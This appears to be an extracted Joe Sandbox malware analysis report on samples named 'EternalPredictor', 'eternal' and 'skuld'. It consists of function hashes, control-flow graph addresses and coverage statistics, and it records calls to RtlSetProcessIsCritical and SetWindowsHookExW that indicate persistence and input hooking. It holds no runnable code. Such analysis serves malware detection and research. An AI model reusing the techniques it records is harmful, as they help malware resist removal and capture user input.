                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e2f8ffea086f91ee10249c19f34b1cc996b57461f801dbbe1bdc6185ed874ad0
                                                                                                                                                                                                                                  • Instruction ID: f8e74df71e511f88664993ace71368703226c09943ad16d92e90e901c8a34931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2f8ffea086f91ee10249c19f34b1cc996b57461f801dbbe1bdc6185ed874ad0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0F4B062D5164BE755BE3CE4551B973D9EF89314B2001BAD84EC3282CE28EC424786
                                                                                                                                                                                                                                  Function 00007FFB4A1204B0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 85b117b7f5eff043de388af495522db0f62f3d6c2834911b8993f453e7ac40f6
                                                                                                                                                                                                                                  • Instruction ID: 530392678e4e880f3cab013e5a75aebb00a84f4adfb2b632693b44383ec6501a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85b117b7f5eff043de388af495522db0f62f3d6c2834911b8993f453e7ac40f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0F4B072C9154BE654BE38E46426973D9FF8D304B500179D80EC3380DE2CEC424B82

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:24.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:6
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 4345 7ffb4a132ff1 4346 7ffb4a132ff7 RtlSetProcessIsCritical 4345->4346 4348 7ffb4a1330d2 4346->4348 4349 7ffb4a132b62 4350 7ffb4a133230 SetWindowsHookExW 4349->4350 4352 7ffb4a1332e1 4350->4352

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A13186D Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CAN_^
                                                                                                                                                                                                                                  • API String ID: 0-3098826533
                                                                                                                                                                                                                                  • Opcode ID: 670f34549caa67486924d89acff67afe75395a8cd0ae83b4aadeb72f074f9088
                                                                                                                                                                                                                                  • Instruction ID: 31422d7b30499139d98a305e76e9c9316d115dd956ac05693120c166dfec3366
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 670f34549caa67486924d89acff67afe75395a8cd0ae83b4aadeb72f074f9088
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4812D2A1A2DA064FF799FF3CC85937977D2EF99340F6405B9D44EC3292DE28A8414781
                                                                                                                                                                                                                                  Function 00007FFB4A137EC6 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 509 7ffb4a137ec6-7ffb4a137ed3 510 7ffb4a137ede-7ffb4a137f23 509->510 511 7ffb4a137ed5-7ffb4a137edd 509->511 513 7ffb4a137f24-7ffb4a137f3d 510->513 511->510 513->513 514 7ffb4a137f3f-7ffb4a137fa7 513->514 517 7ffb4a138013 514->517 518 7ffb4a137fa9-7ffb4a137fb2 514->518 520 7ffb4a138015-7ffb4a13803a 517->520 518->517 519 7ffb4a137fb4-7ffb4a137fc0 518->519 521 7ffb4a137fc2-7ffb4a137fd4 519->521 522 7ffb4a137ff9-7ffb4a138011 519->522 526 7ffb4a13803c-7ffb4a138045 520->526 527 7ffb4a1380a6 520->527 524 7ffb4a137fd6 521->524 525 7ffb4a137fd8-7ffb4a137feb 521->525 522->520 524->525 525->525 528 7ffb4a137fed-7ffb4a137ff5 525->528 526->527 529 7ffb4a138047-7ffb4a138053 526->529 530 7ffb4a1380a8-7ffb4a138150 527->530 528->522 531 7ffb4a13808c-7ffb4a1380a4 529->531 532 7ffb4a138055-7ffb4a138067 529->532 541 7ffb4a1381be 530->541 542 7ffb4a138152-7ffb4a13815c 530->542 531->530 533 7ffb4a13806b-7ffb4a13807e 532->533 534 7ffb4a138069 532->534 533->533 536 7ffb4a138080-7ffb4a138088 533->536 534->533 536->531 544 7ffb4a1381c0-7ffb4a1381e9 541->544 542->541 543 7ffb4a13815e-7ffb4a13816b 542->543 545 7ffb4a13816d-7ffb4a13817f 543->545 546 7ffb4a1381a4-7ffb4a1381bc 543->546 551 7ffb4a1381eb-7ffb4a1381f6 544->551 552 7ffb4a138253 544->552 547 7ffb4a138181 545->547 548 7ffb4a138183-7ffb4a138196 545->548 546->544 547->548 548->548 550 7ffb4a138198-7ffb4a1381a0 548->550 550->546 551->552 554 7ffb4a1381f8-7ffb4a138206 551->554 553 7ffb4a138255-7ffb4a1382e6 552->553 562 7ffb4a1382ec-7ffb4a1382fb 553->562 555 7ffb4a13823f-7ffb4a138251 554->555 556 7ffb4a138208-7ffb4a13821a 554->556 555->553 557 7ffb4a13821e-7ffb4a138231 556->557 558 7ffb4a13821c 556->558 557->557 560 7ffb4a138233-7ffb4a13823b 557->560 558->557 560->555 563 7ffb4a1382fd 562->563 564 7ffb4a138303-7ffb4a138346 call 7ffb4a138384 562->564 563->564 571 7ffb4a138347-7ffb4a138360 564->571 571->571 572 7ffb4a138362-7ffb4a138368 571->572 573 7ffb4a13836f-7ffb4a138382 572->573 574 7ffb4a13836a 572->574 574->573
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 91dc1e85a2e84f30548ecee33a4ac6da926ec8f0e4f1dcba5e80bac1ab2a8361
                                                                                                                                                                                                                                  • Instruction ID: e595aef33695952622d979090147e60074310cb96c5470aff6cc4f38caea2c9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91dc1e85a2e84f30548ecee33a4ac6da926ec8f0e4f1dcba5e80bac1ab2a8361
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF1A47090CA8E8FEBA9EF28C8557E977E1FF55310F14426AE84DC7291CF3499458B82
                                                                                                                                                                                                                                  Function 00007FFB4A139098 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 575 7ffb4a139098-7ffb4a1390d3 579 7ffb4a1390d4-7ffb4a1390ed 575->579 579->579 580 7ffb4a1390ef-7ffb4a139157 579->580 583 7ffb4a1391c3 580->583 584 7ffb4a139159-7ffb4a139162 580->584 585 7ffb4a1391c5-7ffb4a1391ea 583->585 584->583 586 7ffb4a139164-7ffb4a139170 584->586 592 7ffb4a1391ec-7ffb4a1391f5 585->592 593 7ffb4a139256 585->593 587 7ffb4a139172-7ffb4a139184 586->587 588 7ffb4a1391a9-7ffb4a1391c1 586->588 590 7ffb4a139186 587->590 591 7ffb4a139188-7ffb4a13919b 587->591 588->585 590->591 591->591 594 7ffb4a13919d-7ffb4a1391a5 591->594 592->593 595 7ffb4a1391f7-7ffb4a139203 592->595 596 7ffb4a139258-7ffb4a13927d 593->596 594->588 597 7ffb4a13923c-7ffb4a139254 595->597 598 7ffb4a139205-7ffb4a139217 595->598 603 7ffb4a1392eb 596->603 604 7ffb4a13927f-7ffb4a139289 596->604 597->596 599 7ffb4a13921b-7ffb4a13922e 598->599 600 7ffb4a139219 598->600 599->599 602 7ffb4a139230-7ffb4a139238 599->602 600->599 602->597 605 7ffb4a1392ed-7ffb4a13931b 603->605 604->603 606 7ffb4a13928b-7ffb4a139298 604->606 613 7ffb4a13931d-7ffb4a139328 605->613 614 7ffb4a13938b 605->614 607 7ffb4a1392d1-7ffb4a1392e9 606->607 608 7ffb4a13929a-7ffb4a1392ac 606->608 607->605 609 7ffb4a1392ae 608->609 610 7ffb4a1392b0-7ffb4a1392c3 608->610 609->610 610->610 612 7ffb4a1392c5-7ffb4a1392cd 610->612 612->607 613->614 615 7ffb4a13932a-7ffb4a139338 613->615 616 7ffb4a13938d-7ffb4a13947a 614->616 617 7ffb4a139371-7ffb4a139389 615->617 618 7ffb4a13933a-7ffb4a13934c 615->618 627 7ffb4a13947c 616->627 628 7ffb4a139482-7ffb4a1394c2 call 7ffb4a139500 616->628 617->616 620 7ffb4a13934e 618->620 621 7ffb4a139350-7ffb4a139363 618->621 620->621 621->621 623 7ffb4a139365-7ffb4a13936d 621->623 623->617 627->628 635 7ffb4a1394c3-7ffb4a1394dc 628->635 635->635 636 7ffb4a1394de-7ffb4a1394e4 635->636 637 7ffb4a1394eb-7ffb4a1394ff 636->637 638 7ffb4a1394e6 636->638 638->637
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 66fa6a9aa59e98bf610279081a408d17ec8e5b380ae88833fe5ecf0d81bd79b8
                                                                                                                                                                                                                                  • Instruction ID: e904ee9fa13c5736cebc5abf3b9863d26f54281d3b4c4e0f324a5b43c81fd90f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fa6a9aa59e98bf610279081a408d17ec8e5b380ae88833fe5ecf0d81bd79b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6E1B27090CA4E8FFBA8EF28C8557E977E1FF55310F14826AE80DC7695DE34A9408B81
                                                                                                                                                                                                                                  Function 00007FFB4A132059 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 606722e531f10fdd310cccd94438fdf5ef1217719f6da9a1c96fae09fba3e6a7
                                                                                                                                                                                                                                  • Instruction ID: aa7780af6ea10916b025d83e4fb8d9aed527c8ae363cfb0ca528dfbce784f72a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606722e531f10fdd310cccd94438fdf5ef1217719f6da9a1c96fae09fba3e6a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 145102A0A1E6C54FE796BF7C8869275BFD5DF97215B1800FAE08DC71A3ED18580AC342
                                                                                                                                                                                                                                  Function 00007FFB4A132FF1 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 132 7ffb4a132ff1-7ffb4a132ff5 133 7ffb4a132ffa-7ffb4a133009 132->133 134 7ffb4a132ff7-7ffb4a132ff8 132->134 135 7ffb4a13300b 133->135 136 7ffb4a13300c-7ffb4a1330d0 RtlSetProcessIsCritical 133->136 134->133 135->136 140 7ffb4a1330d2 136->140 141 7ffb4a1330d8-7ffb4a13310d 136->141 140->141
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2695349919-0
                                                                                                                                                                                                                                  • Opcode ID: 6cb1d8f23b00bac7ce6c7ff9d8aa07b57be4ed85f8be32dcb301ec75fb2eb5d7
                                                                                                                                                                                                                                  • Instruction ID: f5d973a462f6a602d5ee03ed9266ea65616496c6a0ee976e49da5d7dc658bd9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cb1d8f23b00bac7ce6c7ff9d8aa07b57be4ed85f8be32dcb301ec75fb2eb5d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41337180C6498FEB19EF6CD849AF97BF0EF56321F14016FE08AC3582CB246846CB91
                                                                                                                                                                                                                                  Function 00007FFB4A133208 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 143 7ffb4a133208-7ffb4a13320f 144 7ffb4a133211-7ffb4a133219 143->144 145 7ffb4a13321a-7ffb4a13328d 143->145 144->145 149 7ffb4a133293-7ffb4a1332a0 145->149 150 7ffb4a133319-7ffb4a13331d 145->150 151 7ffb4a1332a2-7ffb4a1332df SetWindowsHookExW 149->151 150->151 153 7ffb4a1332e1 151->153 154 7ffb4a1332e7-7ffb4a133318 151->154 153->154
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HookWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2559412058-0
                                                                                                                                                                                                                                  • Opcode ID: 8e32cf153686a4bf5303edc510d84ecdbaeae5bd4222bc5c6c733c40289cfbc6
                                                                                                                                                                                                                                  • Instruction ID: 471c3cfb24f52ed2fd49cc86167c6399c1edd94a21b8841ce9dba7e856bf98a6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e32cf153686a4bf5303edc510d84ecdbaeae5bd4222bc5c6c733c40289cfbc6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB312B7190CA4D4FDB18EF6CD8466F9BBE1EF55321F10427ED009C3192CE64A812CB81
                                                                                                                                                                                                                                  Function 00007FFB4A132B62 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 157 7ffb4a132b62-7ffb4a13328d 161 7ffb4a133293-7ffb4a1332a0 157->161 162 7ffb4a133319-7ffb4a13331d 157->162 163 7ffb4a1332a2-7ffb4a1332df SetWindowsHookExW 161->163 162->163 165 7ffb4a1332e1 163->165 166 7ffb4a1332e7-7ffb4a133318 163->166 165->166
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HookWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2559412058-0
                                                                                                                                                                                                                                  • Opcode ID: 15292747addaf39e739917e3ca3a1b3591ac89d191da05f776c5439ce5feb34d
                                                                                                                                                                                                                                  • Instruction ID: 0e71faef3c9cb81b8ae004bc3a77573547f9f3698b97590fb316061884cf7b29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15292747addaf39e739917e3ca3a1b3591ac89d191da05f776c5439ce5feb34d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8931E671A1CA1D8FEB58EF6CD8066F977E5EB59321F10413ED04ED3251CE60A8128BC5

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A13669D Relevance: .4, Instructions: 417COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a72ae67ad1b043c91e401570ecffe9ca2d6c8fbd00c2a182062d69933961571a
                                                                                                                                                                                                                                  • Instruction ID: ebdda85eb13cd870af3f56c6609309d5fb1959d182a7a85bf264e34c9d59d253
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a72ae67ad1b043c91e401570ecffe9ca2d6c8fbd00c2a182062d69933961571a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1ED1D77190C74D4FEB19EFA8D8456E9BBE1EF96321F1442AFD049C3292CE746805CB91

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00D64DE0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1548914737.0000000000CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1548669251.0000000000CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550008389.0000000001633000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550039957.000000000163B000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550070035.000000000163C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550208273.0000000001640000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550247719.0000000001645000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550298413.0000000001649000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550403280.0000000001659000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550481571.000000000165C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550542165.0000000001676000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550565836.0000000001677000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550595214.0000000001679000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550631447.000000000168A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550659968.000000000168E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550687873.000000000168F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016AB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550944413.00000000016FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550984975.0000000001718000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1551009951.0000000001719000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_cf0000_skuld.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction ID: 9884ae7dd942394ac47826abdbbefc86d9c42104ba989b633c82d0f355911fc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F31982791CFC482D3218B24F5413AAB364F7A9784F15A315EFC812A1ADF38E2E5CB50
                                                                                                                                                                                                                                  Function 00D61100 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1548914737.0000000000CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1548669251.0000000000CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550008389.0000000001633000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550039957.000000000163B000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550070035.000000000163C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550208273.0000000001640000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550247719.0000000001645000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550298413.0000000001649000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550403280.0000000001659000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550481571.000000000165C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550542165.0000000001676000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550565836.0000000001677000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550595214.0000000001679000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550631447.000000000168A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550659968.000000000168E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550687873.000000000168F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016AB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550944413.00000000016FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550984975.0000000001718000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1551009951.0000000001719000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_cf0000_skuld.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction ID: 80019dc4ddb0fe301f424796f8e716d0101d7a9678c4ba98569a6b04074d1549
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:8.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.1%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:29
